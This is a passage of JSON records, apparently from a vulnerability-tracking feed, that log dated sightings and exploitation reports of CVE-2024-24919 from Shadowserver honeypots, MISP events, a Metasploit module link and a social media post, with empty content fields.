"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-01)", "content": "", "creation_timestamp": "2025-11-01T00:00:00.000000Z"}, {"uuid": "07eee8eb-5ea4-4913-811a-0c9dfb8652df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-13)", "content": "", "creation_timestamp": "2025-08-13T00:00:00.000000Z"}, {"uuid": "0fe454a5-e28c-46a5-9267-d36472d1ce1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-22)", "content": "", "creation_timestamp": "2025-11-22T00:00:00.000000Z"}, {"uuid": "60a71263-e8aa-486a-ac8c-e607bdfe5d48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-07)", "content": "", "creation_timestamp": "2025-09-07T00:00:00.000000Z"}, {"uuid": "b372e3fb-8219-4d14-96ba-2eaa9eed2220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-03)", "content": "", "creation_timestamp": "2025-10-03T00:00:00.000000Z"}, {"uuid": "ea008dab-6917-4220-822a-defe17925657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-12)", "content": "", "creation_timestamp": "2025-11-12T00:00:00.000000Z"}, {"uuid": "fd8f7f90-b1f0-444f-9e22-1e847d4d460b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-26)", "content": "", "creation_timestamp": "2025-10-26T00:00:00.000000Z"}, {"uuid": "58d8a1fd-a0c3-4e76-af35-bc7756c7516c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-15)", "content": "", "creation_timestamp": "2025-08-15T00:00:00.000000Z"}, {"uuid": "34296238-a9c5-40cd-b5c5-520ca5e5c322", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-15)", "content": "", "creation_timestamp": "2025-08-15T00:00:00.000000Z"}, {"uuid": "c1d3b18d-2555-4dfd-ad44-05a092729e3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-16)", "content": "", "creation_timestamp": "2025-08-16T00:00:00.000000Z"}, {"uuid": "7e5cd0ec-c695-478f-9991-9b1d23d136a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-16)", "content": "", "creation_timestamp": "2025-11-16T00:00:00.000000Z"}, {"uuid": "fe77b4fe-3ad5-465b-b1e9-f258eecd38fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-10)", "content": "", "creation_timestamp": "2025-09-10T00:00:00.000000Z"}, {"uuid": "09979d8b-1103-4165-a58c-1b812e509848", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-14)", "content": "", "creation_timestamp": "2025-08-14T00:00:00.000000Z"}, {"uuid": "e8bbc74e-fae4-406d-bee2-52b0a7a6ef71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-10)", "content": "", "creation_timestamp": "2025-11-10T00:00:00.000000Z"}, {"uuid": "f1d27c82-cd9a-47c5-a609-8e9d4fc43c68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-25)", "content": "", "creation_timestamp": "2025-11-25T00:00:00.000000Z"}, {"uuid": "9d0e8cb0-0de0-461f-8346-df023a894f1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-14)", "content": "", "creation_timestamp": "2025-08-14T00:00:00.000000Z"}, {"uuid": "eb484365-6cd0-47f4-9144-47360ddd4c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-03)", "content": "", "creation_timestamp": "2025-10-03T00:00:00.000000Z"}, {"uuid": "27f2bcf4-0678-4b71-94f8-d9ccd870f363", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-28)", "content": "", "creation_timestamp": "2025-10-28T00:00:00.000000Z"}, {"uuid": "db8d73fc-d0f9-440b-bd46-0965d8c71424", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-13)", "content": "", "creation_timestamp": "2025-11-13T00:00:00.000000Z"}, {"uuid": "22c3bdf2-fcd4-4201-9596-e49281ed2449", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-18)", "content": "", "creation_timestamp": "2025-08-18T00:00:00.000000Z"}, {"uuid": "8badb548-3789-4af8-8c67-3c3512f75f3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-09)", "content": "", "creation_timestamp": "2025-10-09T00:00:00.000000Z"}, {"uuid": "b190f40f-d895-4b7b-8c62-a05f07803490", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-16)", "content": "", "creation_timestamp": "2025-10-16T00:00:00.000000Z"}, {"uuid": "63649e18-6533-4358-bd51-ecc96e3ec8b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-22)", "content": "", "creation_timestamp": "2025-09-22T00:00:00.000000Z"}, {"uuid": "2dfd08f1-e168-4f95-a633-1ae093bf0bbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-08-19)", "content": "", "creation_timestamp": "2025-08-19T00:00:00.000000Z"}, {"uuid": "dedc31ee-f09e-461e-b7f8-95d084d1f921", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-16)", "content": "", "creation_timestamp": "2025-10-16T00:00:00.000000Z"}, {"uuid": "f983dd62-8ec9-4e08-b03d-cdb631a1ec3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-11)", "content": "", "creation_timestamp": "2025-10-11T00:00:00.000000Z"}, {"uuid": "4e9d6fae-cf3b-4a79-abe7-ec7a035b15aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-20)", "content": "", "creation_timestamp": "2025-10-20T00:00:00.000000Z"}, {"uuid": "6f4f0042-d35c-46a3-96f6-3492c8af6332", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/e1f6260f-3311-441b-92ae-e04cd5eb5f72", "content": "", "creation_timestamp": "2025-08-19T13:26:45.000000Z"}, {"uuid": "db0708fe-f3c7-4366-a779-db3841992f84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-22)", "content": "", "creation_timestamp": "2025-09-22T00:00:00.000000Z"}, {"uuid": "db0bfc24-11b9-45b3-815c-8d77e1b76864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-19)", "content": "", "creation_timestamp": "2025-11-19T00:00:00.000000Z"}, {"uuid": "14c77905-1f17-4b17-b21c-e773a41607da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-14)", "content": "", "creation_timestamp": "2025-10-14T00:00:00.000000Z"}, {"uuid": "b873e904-3a44-4ebf-a840-d6e5088f5f08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-05)", "content": "", "creation_timestamp": "2025-11-05T00:00:00.000000Z"}, {"uuid": "674dd2f9-a942-43cc-825b-8ccd1f79676f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-28)", "content": "", "creation_timestamp": "2025-10-28T00:00:00.000000Z"}, {"uuid": "32bf542d-a529-40d6-a5d4-62c0d50f1b98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-30)", "content": "", "creation_timestamp": "2025-10-30T00:00:00.000000Z"}, {"uuid": "6b162b2f-3138-4155-9da1-455c2e501c91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-29)", "content": "", "creation_timestamp": "2025-09-29T00:00:00.000000Z"}, {"uuid": "8780fe80-fab4-47fd-a28a-bde1caf382e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-10)", "content": "", "creation_timestamp": "2025-10-10T00:00:00.000000Z"}, {"uuid": "3e59bb6a-b1e3-44cb-aa82-c7d607b98290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-08)", "content": "", "creation_timestamp": "2025-09-08T00:00:00.000000Z"}, {"uuid": "0d251730-d46d-45af-b3de-5307b62dabbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-08)", "content": "", "creation_timestamp": "2025-09-08T00:00:00.000000Z"}, {"uuid": "fc347322-4a53-463c-8398-118aa18f3a09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-23)", "content": "", "creation_timestamp": "2025-08-23T00:00:00.000000Z"}, {"uuid": "4faeed19-6aa0-4d48-a088-79c77a12c468", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-07)", "content": "", "creation_timestamp": "2025-10-07T00:00:00.000000Z"}, {"uuid": "09c73da5-fa0c-49a7-9f47-c7e81fe7ce98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-10)", "content": "", "creation_timestamp": "2025-10-10T00:00:00.000000Z"}, {"uuid": "fb7592c5-a188-4e89-8031-8ae089cf648f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-09)", "content": "", "creation_timestamp": "2025-11-09T00:00:00.000000Z"}, {"uuid": "c1b702b8-6752-4f3a-b7da-b5bf4bafc07f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-18)", "content": "", "creation_timestamp": "2025-11-18T00:00:00.000000Z"}, {"uuid": "57239c4e-2111-4865-9bee-38931545b5a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "8ceb0f8e-c559-456f-bfdb-117c037a83ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-12)", "content": "", "creation_timestamp": "2025-10-12T00:00:00.000000Z"}, {"uuid": "498e0d94-d091-4e13-8ec3-115b5052088c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-02)", "content": "", "creation_timestamp": "2025-11-02T00:00:00.000000Z"}, {"uuid": "b1ca3b14-e4e9-447f-b1cc-225a0ee217a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-05)", "content": "", "creation_timestamp": "2025-11-05T00:00:00.000000Z"}, {"uuid": "62321728-0c5b-40c6-a183-534aa23b63f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-24)", "content": "", "creation_timestamp": "2025-11-24T00:00:00.000000Z"}, {"uuid": "18752ed0-4a7b-46c1-b60c-0bcaa9470b3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-15)", "content": "", "creation_timestamp": "2025-09-15T00:00:00.000000Z"}, {"uuid": "f8d452be-4675-4f00-a92c-9dc227788da3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-10-17)", "content": "", "creation_timestamp": "2025-10-17T00:00:00.000000Z"}, {"uuid": "58946092-5d51-4dab-835f-4213135f051b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-15)", "content": "", "creation_timestamp": "2025-09-15T00:00:00.000000Z"}, {"uuid": "a924a08a-c4c2-4c99-b4f3-7bb3fdfd3fff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb", "content": "", "creation_timestamp": "2024-06-13T18:29:14.000000Z"}, {"uuid": "547cef49-2318-47e9-a640-a0dbebab9dd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-25)", "content": "", "creation_timestamp": "2025-08-25T00:00:00.000000Z"}, {"uuid": "23c7c41c-0e99-4978-9c7b-8271222dffce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-12)", "content": "", "creation_timestamp": "2025-10-12T00:00:00.000000Z"}, {"uuid": "df3277fe-d109-47f5-81f6-b99fdbdb3768", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-10-17)", "content": "", "creation_timestamp": "2025-10-17T00:00:00.000000Z"}, {"uuid": "d4fd58fb-422b-4f90-837e-97dcc7f28e72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-27)", "content": "", "creation_timestamp": "2025-08-27T00:00:00.000000Z"}, {"uuid": "c80b451f-07ca-4e7f-b6e6-267678446bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-14)", "content": "", "creation_timestamp": "2025-11-14T00:00:00.000000Z"}, {"uuid": "f35d9249-39bb-47fa-ab01-bf5e5668ec88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-30)", "content": "", "creation_timestamp": "2025-09-30T00:00:00.000000Z"}, {"uuid": "01b3574c-4773-4dad-9320-56005f40a0a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-26)", "content": "", "creation_timestamp": "2025-08-26T00:00:00.000000Z"}, {"uuid": "a7b40469-3a56-416f-a1c9-beb97a710b2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-28)", "content": "", "creation_timestamp": "2025-08-28T00:00:00.000000Z"}, {"uuid": "cf27e36c-53b1-4d50-9f50-a65a1e310328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-26)", "content": "", "creation_timestamp": "2025-09-26T00:00:00.000000Z"}, {"uuid": "e2f56e54-ba96-4cf9-8e06-45f741b585aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:26.000000Z"}, {"uuid": "e61acec0-6ca4-40cf-9a39-bb0e61338502", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-01)", "content": "", "creation_timestamp": "2025-09-01T00:00:00.000000Z"}, {"uuid": "3a113836-2855-42c8-b0ab-7bcbdc9e525f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-31)", "content": "", "creation_timestamp": "2025-08-31T00:00:00.000000Z"}, {"uuid": "597d0764-2aca-4db0-aa30-8578da6552d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-02)", "content": "", "creation_timestamp": "2025-09-02T00:00:00.000000Z"}, {"uuid": "287e574e-3074-4496-8818-02ef22061f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-09-24)", "content": "", "creation_timestamp": "2025-09-24T00:00:00.000000Z"}, {"uuid": "8a6adb7c-fbde-49a8-bd8d-270890e9978a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-04)", "content": "", "creation_timestamp": "2025-09-04T00:00:00.000000Z"}, {"uuid": "da0fc205-5284-493f-9990-18c4ae3500ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-03)", "content": "", "creation_timestamp": "2025-09-03T00:00:00.000000Z"}, {"uuid": "d003f338-6594-4650-b7e2-daead67d1137", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-08)", "content": "", "creation_timestamp": "2025-12-08T00:00:00.000000Z"}, {"uuid": "de9fb935-b12c-48ba-9476-85177cc64894", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-27)", "content": "", "creation_timestamp": "2026-02-27T00:00:00.000000Z"}, {"uuid": "4e2d0bb9-cffd-42e9-98c6-a5907ef6a0d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-12)", "content": "", "creation_timestamp": "2026-02-12T00:00:00.000000Z"}, {"uuid": "14f41173-85ee-4047-a8d4-11cebc9c6c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-11-07)", "content": "", "creation_timestamp": "2025-11-07T00:00:00.000000Z"}, {"uuid": "46225499-729f-4535-86e9-a81e6b4e6eae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-06)", "content": "", "creation_timestamp": "2025-12-06T00:00:00.000000Z"}, {"uuid": "5b6df87b-d45e-42a9-a7bf-5bdf96e2f734", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3m7owd6uvv52l", "content": "", "creation_timestamp": "2025-12-11T06:15:30.504044Z"}, {"uuid": 